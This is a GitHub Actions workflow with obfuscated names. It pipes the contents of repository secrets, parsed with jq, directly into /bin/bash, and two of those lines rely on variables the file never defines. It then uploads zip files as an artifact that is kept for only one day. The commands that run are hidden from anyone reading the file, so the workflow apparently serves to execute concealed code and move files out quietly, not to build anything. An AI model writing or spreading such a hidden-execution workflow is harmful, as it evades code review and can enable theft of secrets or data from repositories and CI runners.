name: strapisharonnew
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: strapisharonnew
        env:
          eew19: ${{ secrets.eew19 }}
        run: |
          printf '%s' "$eew19" | jq -r .lwhbi3 | /bin/bash
          printf '%s' "$rwhj50" | jq -r .ep72373 | /bin/bash
          printf '%s' "$hrf5" | jq -r .yjo698 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: aqwUOoZk
          path: "*.zip"
          retention-days: 1
